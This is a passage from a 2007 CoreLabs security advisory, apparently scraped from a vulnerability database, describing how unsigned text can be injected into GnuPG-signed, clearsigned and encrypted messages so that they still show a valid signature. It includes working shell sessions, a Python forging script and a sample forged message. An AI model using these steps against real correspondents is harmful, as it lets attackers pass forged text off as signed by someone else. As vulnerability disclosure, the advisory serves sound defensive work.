Gerardo Richarte <gera@core-sdi.com>\r\ngpg: Good signature from "Gerardo Richarte <gera@core-sdi.com>"\r\n[GNUPG:] VALIDSIG A3901BBA2C58D6795A7186F9404F4B533944C2D0 2007-02-22 1172176420 0 3 0 17 2 00 A3901BBA2C58D6795A7186F9404F4B533944C2D0\r\n[GNUPG:] TRUST_UNDEFINED\r\nPrimary key fingerprint: A390 1BBA 2C58 D679 5A71 86F9 404F 4B53 3944 C2D0\r\n- ----------------\r\n\r\n When GnuPG is used on files (vs. used through standard input and output),\r\n the user will be asked if the output file can be overwritten, and only the\r\n content of one Literal packet will be stored in the output file. If the\r\n user chooses not to overwrite the file, and just presses Enter as answer\r\n to the alternative file name, GnuPG's behaviour is not clear enough, and\r\n the user may be fooled into believing the forged text is actually\r\n correctly signed. However, the sole y/n question may be interpreted as\r\n enough sign that something weird is going on:\r\n\r\n- ----------------\r\ngera@poxiran:~/gpg$ gpg hoax.gpg\r\nFile `hoax' exists. Overwrite? (y/N) n\r\nEnter new filename:\r\ngpg: Signature made Thu 22 Feb 2007 05:33:40 PM ART using DSA key ID 3944C2D0\r\ngpg: Good signature from "Gerardo Richarte <gera@core-sdi.com>"\r\nPrimary key fingerprint: A390 1BBA 2C58 D679 5A71 86F9 404F 4B53 3944 C2D0\r\ngera@poxiran:~/gpg$ ls -l\r\ntotal 16\r\n- -rw-r--r-- 1 gera gera 38 2007-02-23 12:16 hoax\r\n- -rw-r--r-- 1 gera gera 216 2007-02-22 17:36 hoax.gpg\r\n- -rw-r--r-- 1 gera gera 46 2007-02-22 17:35 prefix.gpg\r\n- -rw-r--r-- 1 gera gera 170 2007-02-22 17:33 signed.gpg\r\ngera@poxiran:~/gpg$ cat hoax\r\nThis text is inserted by the attacker\r\ngera@poxiran:~/gpg$\r\n- ----------------\r\n\r\n*Attack Variant 2: Prepending plaintext to a "clearsign" message\r\n\r\n Clearsign messages are messages signed and encapsulated to be sent as an\r\n email: the text of the message is not encoded in any way and can be read\r\n without the help of GnuPG, and the signature is encoded using base64. If\r\n you wanted to perform an attack on somebody, you would first need an\r\n email signed by the victim, and then perform this attack on it.\r\n\r\n We found two different ways of prepending a forged text to a clearsign\r\n message. The first is simpler, but probably more visible to the victim.\r\n The second is not so straightforward and clean, but may appear a little\r\n bit less suspicious.\r\n\r\n A description of the first way to prepend plaintext to a "clearsign"\r\n message follows:\r\n\r\n- ----------------\r\ngera@poxiran:~/gpg$ gpg -z0 --store -a --output clear_forged.txt\r\nThis text was inserted by the attacker!\r\ngera@poxiran:~/gpg$ gpg --clearsign --output clear_signed.txt\r\n\r\nYou need a passphrase to unlock the secret key for\r\nuser: "Gerardo Richarte <gera@core-sdi.com>"\r\n1024-bit DSA key, ID 3944C2D0, created 1999-02-16\r\n\r\nThis text is in clear, and signed.\r\n\r\ngera@poxiran:~/gpg$ cat clear_signed.txt\r\n- -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nThis text is in clear, and signed.\r\n- -----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.3 (GNU/Linux)\r\n\r\niD8DBQFF3xlcQE9LUzlEwtARAnJDAKCdWgHGdQr7r2yiYVG44NsYfGzNoQCfaPG9\r\nJrhgBPYXGkBivmKlA879IvA=\r\n=/97+\r\n- -----END PGP SIGNATURE-----\r\ngera@poxiran:~/gpg$ cat clear_forged.txt clear_signed.txt >clear_hoax.txt\r\ngera@poxiran:~/gpg$ gpg <clear_hoax.txt\r\nThis text was inserted by the attacker!\r\nThis text is in clear, and signed.\r\ngpg: Signature made Fri 23 Feb 2007 01:42:04 PM ART using DSA key ID 3944C2D0\r\ngpg: Good signature from "Gerardo Richarte <gera@core-sdi.com>"\r\nPrimary key fingerprint: A390 1BBA 2C58 D679 5A71 86F9 404F 4B53 3944 C2D0\r\n- ----------------\r\n\r\n Although GnuPG behaves exactly like in Attack Variant 1 previously\r\n described, some applications using it, like Enigmail, independently\r\n detect the boundaries of GPG data by inspecting the message, and, in\r\n Enigmail's case, for example, only process the first part of\r\n clear_hoax.txt, but don't process the signature part, making\r\n Enigmail/GnuPG not vulnerable to this specific mode of attack. It may be\r\n possible to fool Enigmail by using PGP/MIME, but our quick tests showed no\r\n results.\r\n\r\n We have not tested other applications like Kmail or Evolution with this\r\n approach.\r\n\r\n Note in the previous example that clear_signed.txt is how a signed email\r\n looks like. When performing our tests we found problems when copying the\r\n clearsign text from an email, specially regarding CrLf conversions and\r\n trimmed spaces at end of lines. We had to be very careful when extracting\r\n the original signed text from the email.\r\n\r\n For the second way to prepend a forged text to a "clearsign message" we\r\n will first convert the clearsign message to a standard GnuPG signed\r\n message, and then we'll do just the same we did in Attack Variant 1.\r\n\r\n From a clearsign message, either created using --clearsign or cut&pasted\r\n from an email, we need to extract the plaintext and the detached\r\n signature, and then build a GnuPG message from it. The following python\r\n script, although not perfect, will do just that (you'll need gpg.py [3] and\r\n Impacket [2]):\r\n\r\n- ---------------- clearsign2sign.py\r\n#!/usr/bin/python\r\nimport os, gpg, sys, base64\r\n\r\nclear_sign = open(sys.argv[1], "rb").read().splitlines()\r\n\r\nstart = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----")\r\nmid = clear_sign.index("-----BEGIN PGP SIGNATURE-----")\r\nend = clear_sign.index("-----END PGP SIGNATURE-----")\r\n\r\ntext = '\r\n'.join(clear_sign[start+3:mid])\r\nsign = '\n'.join(clear_sign[mid+3:end-1])\r\n\r\nonepass = gpg.OnePassSignature()\r\nonepass['keyid'] = (0x12341234,0x12341234)\r\nonepass['digest_algo'] = 2\r\nonepass['pubkey_algo'] = 1\r\nonepass['sigclass'] = 1\r\n\r\nplain1 = gpg.Plaintext()\r\nplain1['name'] = 'original'\r\nplain1['data'] = text\r\nplain1['mode'] = 0x62\r\n\r\nsignature = gpg.Raw()\r\nsignature['data'] = base64.decodestring(sign)\r\n\r\ncompressed = gpg.Compressed()\r\ncompressed['algorithm'] = gpg.COMPRESS_ALGO_ZLIB\r\ncompressed['data'] = [onepass, plain1, signature]\r\n\r\npkt = gpg.Packet()\r\npkt['version'] = 1\r\npkt['data'] = compressed\r\n\r\nos.write(1,str(pkt))\r\n- ----------------\r\n\r\n This script will create a GnuPG message with the following structure:\r\n\r\n Compress ( OnePassSignature + Literal + Signature )\r\n\r\n To verify that the generated file is valid, we can pipe the output to gpg:\r\n\r\n- ----------------\r\ngera@poxiran:~/gpg$ ./clearsign2sign.py clear_signed.txt |gpg\r\nThis text is in clear, and signed.\r\ngpg: Signature made Fri 23 Feb 2007 06:23:40 PM ART using DSA key ID 3944C2D0\r\ngpg: Good signature from "Gerardo Richarte <gera@core-sdi.com>"\r\nPrimary key fingerprint: A390 1BBA 2C58 D679 5A71 86F9 404F 4B53 3944 C2D0\r\ngera@poxiran:~/gpg$ ./clearsign2sign.py clear_signed.txt |gpg --list-packets\r\n:compressed packet: algo=2\r\n:onepass_sig packet: keyid 1234123412341234\r\n version 3, sigclass 00, digest 2, pubkey 1, last=1\r\n:literal data packet:\r\n mode b (62), created 0, name="original",\r\n raw data: 36 bytes\r\n:signature packet: algo 17, keyid 404F4B533944C2D0\r\n version 3, created 1172265820, md5len 5, sigclass 01\r\n digest algo 2, begin of digest 69 31\r\n data: [158 bits]\r\n data: [158 bits]\r\ngera@poxiran:~/gpg$\r\n- ----------------\r\n\r\n The generated message can, again, be used as described in Attack Variant\r\n 1, concatenated to a forged plaintext, to perform an attack.\r\n\r\n If you want to send this as an email, the easiest way is to compose an\r\n email in your mail client, insert PGP/GPG header and footer, and paste a\r\n base64 version of the concatenation of forged.gpg and the output from\r\n clearsign2sign.py:\r\n\r\n- ----------------\r\ngera@poxiran:~/gpg$ ./clearsign2sign.py clear_signed.txt >cleared.gpg\r\ngera@poxiran:~/gpg$ cat forged.gpg cleared.gpg | uuencode -m . > hoax.b64\r\ngera@poxiran:~/gpg$ cat hoax.b64\r\nbegin-base64 644 ,\r\nyyxiAEXd/nRUaGlzIHRleHQgaXMgaW5zZXJ0ZWQgYnkgdGhlIGF0dGFja2Vy\r\nCsiJAnicO8LLzMDEKGQCgYynjZI48osy0zPzEnMYgCAkI7NYoSS1okQBSGfm\r\nKSTnpCYW6Sgk5qUoFGem56Wm6PFyddgzszK63o+OcfD3DrZ0OXRBkCnTkGGe\r\n/p3lC5bMX5O579Kxm+fkWEQfPGb7yzDPSvTKol/m67kNGjsSmd05t7TFl3oC\r\nAFw8Lgo=\r\n====\r\n- ----------------\r\n\r\n And this is how the final mail text should look like (first and last lines\r\n of uudecode output's removed):\r\n\r\n- -----BEGIN PGP MESSAGE-----\r\nVersion: GnuPG v1.4.3 (GNU/Linux)\r\n\r\nyyxiAEXd/nRUaGlzIHRleHQgaXMgaW5zZXJ0ZWQgYnkgdGhlIGF0dGFja2Vy\r\nCsiJAnicO8LLzMDEKGQCgYynjZI48osy0zPzEnMYgCAkI7NYoSS1okQBSGfm\r\nKSTnpCYW6Sgk5qUoFGem56Wm6PFyddgzszK63o+OcfD3DrZ0OXRBkCnTkGGe\r\n/p3lC5bMX5O579Kxm+fkWEQfPGb7yzDPSvTKol/m67kNGjsSmd05t7TFl3oC\r\nAFw8Lgo=\r\n- -----END PGP MESSAGE-----\r\n\r\n Although not necessarily needed for every use, strictly speaking, the crc24\r\n is missing. If you want, you can use gpg.py to calculate it. Then you just\r\n need to append it before the closing line:\r\n\r\n- ----------------\r\ngera@poxiran:~/gpg$ python\r\n>>> import gpg\r\n>>> print '='+gpg.crc24(open('forged.gpg').read() + open('cleared.gpg').read())\r\n=BLll\r\n- ----------------\r\n\r\n In this example, you need to insert the string '=BLll' in a line before\r\n the -----END PGP MESSAGE----- marker to obtain a complete message.\r\n\r\n We've also confirmed that it's possible to perform the attack using PGP/MIME\r\n to encode the email body as an HTML message, which hides the original text\r\n using an open HTML comment. When PGP/MIME and HTML is used this way, the\r\n attacker can fully replace the message the victim reads, while still\r\n maintaining a valid signature, making the attack even more dangerous.\r\n\r\n*Attack Variant 3: Prepending plaintext to an encrypted and signed message.\r\n\r\n So far we've concentrated on messages that were originally only signed, but\r\n if the original message is also encrypted, the attack is still as easy to\r\n perform as it is for only signed messages.\r\n\r\n The structure of encrypted messages is quite similar for symmetrical\r\n encrypted messages or those encrypted using a public key:\r\n\r\n Symmetrical Encryption:\r\n\r\n SymKeyEnc_SesKey + Encrypted(OnePassSignature + Literal(text) + Signature)\r\n\r\n Public Key Encryption:\r\n\r\n PubKeyEnc_SesKey + Encrypted(OnePassSignature + Literal(text) + Signature)\r\n\r\n The difference is in the first packet, where SymKeyEnc_SesKey is a packet\r\n containing a session key encrypted using a symmetric cipher, and\r\n PubKeyEnc_SesKey contains the session key encrypted using a public key.\r\n This is a simplified example, in the more common case the data inside\r\n Encrypted() will be compressed.\r\n\r\n It would be straightforward to perform the attack as described in Variant\r\n 1 to obtain:\r\n\r\n Literal(bad_text) + SymKeyEnc_SesKey + Encrypted(OnePassSignature + ...)\r\n\r\n or\r\n\r\n Literal(bad_text) + PubKeyEnc_SesKey + Encrypted(OnePassSignature + ...)\r\n\r\n and this would be enough to attack people using any of the\r\n vulnerable GnuPG wrappers. But for people using GnuPG directly on the\r\n command line, they will notice that a part of the message is printed before\r\n asking the passphrase, and that another part is printed after asking\r\n it, which may look suspicious. However, if needed, this behaviour can be\r\n avoided by forcing GnuPG to ask the passphrase prior to processing any\r\n Literal packet and outputting any text. Simply change the order of the\r\n packets in forged message to look like:\r\n\r\n SymKeyEnc_SesKey + Literal(bad_text) + Encrypted(OnePassSignature + ...)\r\n\r\n or\r\n\r\n PubKeyEnc_SesKey + Literal(bad_text) + Encrypted(OnePassSignature + ...)\r\n\r\n With this GnuPG will ask the passphrase as soon as it sees the\r\n *KeyEnc_SesKey packets, and will only decrypt the contents of the\r\n Encrypted() packet, effectively outputting all text without interruption.\r\n\r\n*Attack Variant 4: Hiding the injected text from the naked eye\r\n\r\n In all the previous variants the injected text is stored without any\r\n encryption in the final message, and may be easily seen, probably making\r\n the attack weaker. A very simple solution to this is to compress the\r\n injected Literal packet, producing something like:\r\n\r\n Compressed( Literal(bad_text) ) + original_message\r\n\r\n or even\r\n\r\n Compressed( Literal(bad_text) + original_message )\r\n\r\n The same effect of hiding the injected text can be achieved using\r\n encryption.\r\n\r\n All this more advanced variants can be easily tried using gpg.py.\r\n\r\n Another more advanced option would be to encrypt the injected text, but as\r\n the encryption layer is never disabled, all the remaining data would have\r\n to be encrypted as well. We have not tried this specific setting, but we\r\n are pretty sure it must work.\r\n\r\n\r\n*References*\r\n\r\n[1] The GNU Privacy Guard\r\n http://www.gnupg.org/\r\n\r\n[2] Impacket library\r\n http://oss.coresecurity.com/projects/impacket.html\r\n\r\n[3] File needed to reproduce some of the attacks\r\n http://www.coresecurity.com/files/attachments/gpg.py\r\n\r\n[4] RFC 2440\r\n http://www.ietf.org/rfc/rfc2440.txt\r\n\r\n[5] Similar (but different) vulnerability in GnuPG\r\n http://lists.gnupg.org/pipermail/gnupg-announce/2006q1/000216.html\r\n\r\n\r\n*About CoreLabs*\r\n\r\n CoreLabs, the research center of Core Security Technologies, is charged\r\n with anticipating the future needs and requirements for information\r\n security technologies.\r\n\r\n We conduct our research in several important areas of computer security\r\n including system vulnerabilities, cyber attack planning and simulation,\r\n source code auditing, and cryptography. Our results include problem\r\n formalization, identification of vulnerabilities, novel solutions and\r\n prototypes for new technologies.\r\n\r\n CoreLabs regularly publishes security advisories, technical papers,\r\n project information and shared software tools for public use at:\r\n http://www.coresecurity.com/corelabs/\r\n\r\n\r\n*About Core Security Technologies*\r\n\r\n Core Security Technologies develops strategic solutions that help\r\n security-conscious organizations worldwide. The company\u2019s flagship\r\n product, CORE IMPACT, is the first automated penetration testing\r\n product for assessing specific information security threats to an\r\n organization. Penetration testing evaluates overall network security\r\n and identifies what resources are exposed. It enables organizations to\r\n determine if current security investments are detecting and preventing\r\n attacks.\r\n\r\n Core augments its leading technology solution with world-class security\r\n consulting services, including penetration testing, software security\r\n auditing and related training.\r\n\r\n Based in Boston, MA. and Buenos Aires, Argentina, Core Security\r\n Technologies can be reached at 617-399-6980 or on the Web at\r\n http://www.coresecurity.com.\r\n\r\n\r\n*DISCLAIMER*\r\n\r\n The contents of this advisory are copyright (c) 2007 CORE Security\r\n Technologies and (c) 2007 CoreLabs, and may be distributed freely\r\n provided that no fee is charged for this distribution and proper\r\n credit is given.\r\n\r\n*PGP Key*\r\n\r\n This advisory has been signed with the PGP key of Core Security\r\n Technologies advisories team, which is available for download at\r\n http://www.coresecurity.com/files/attachments/core_security_advisories.asc\r\n\r\n$Id: GPG-injection-advisory.txt 331 2007-03-05 22:21:42Z csarraute $\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\n\r\niD8DBQFF7J1HyNibggitWa0RAtQzAJ0ZTnaInvj6BB6dr/kFw+Cg87SObACfbGwY\r\nISyEYgw4330Ydw9aLihKaF4=\r\n=wWtY\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2007-03-06T00:00:00", "published": "2007-03-06T00:00:00", "id": "SECURITYVULNS:DOC:16265", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16265", "title": "CORE-2007-0115: GnuPG and GnuPG clients unsigned data injection vulnerability", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "cvelist": ["CVE-2007-1269", "CVE-2007-1266", "CVE-2007-1265", "CVE-2007-1264", "CVE-2007-1263", "CVE-2007-1268", "CVE-2007-1267"], "description": "Signed text boundaries are incorrectly shown or not shown, making it's possible to insert unsigned packets.", "edition": 1, "modified": "2007-03-06T00:00:00", "published": "2007-03-06T00:00:00", "id": "SECURITYVULNS:VULN:7351", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7351", "title": "Unsigned content spoofing in multiple application launching GnuPG", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}]}
